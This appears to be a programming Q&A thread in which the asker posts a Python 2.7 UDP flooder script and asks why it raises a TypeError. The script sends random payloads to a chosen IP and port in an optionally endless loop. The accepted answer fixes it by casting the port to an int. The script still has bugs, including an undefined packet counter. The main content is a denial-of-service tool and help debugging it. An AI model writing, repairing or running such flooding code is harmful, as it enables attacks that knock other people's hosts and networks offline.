# Getting a TypeError when trying to send a random packet in a socket

Tags: python, python-2.7

I'm trying to make a simple UDP flooder to learn a a little about sockets, however i get "TypeError: an integer is required"

```
import os
import socket
import random

s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

print("Python Script 1")
os.system("pause")
print("[*] Please enter parameters below")
ip = raw_input("Enter IP adress: ")
port = raw_input("Enter port: ")
size = int(raw_input("Enter Packet size: "))
amount = int(raw_input("Enter amount of packets (0 for infinite): "))
bytes = random._urandom(size)
print("[*] UDP Flooding started on " + ip + ":" + port)

while amount > 1:
    s.sendto(bytes,(ip,port))
    print("[*] Sent %s packets to %s : %s.") % (sent,ip,port)
    sent = sent + 1
    amount = amount - 1

while amount == 0:
    s.sendto(bytes,(ip,port))
    print("[*] Sent %s packets to %s : %s.") % (sent,ip,port)
    sent = sent + 1
```

I get the error on s.sendto(bytes,(ip,port)), I've tried looking around on google but couldn't find anything. Thanks!

Comment: `ip` and `port` are strings when they are returned from `raw_input`. Convert them to `int`s.

Answer (score 1, accepted):

`port` must be an`int`, not a `str`.

```
port = int(port)
```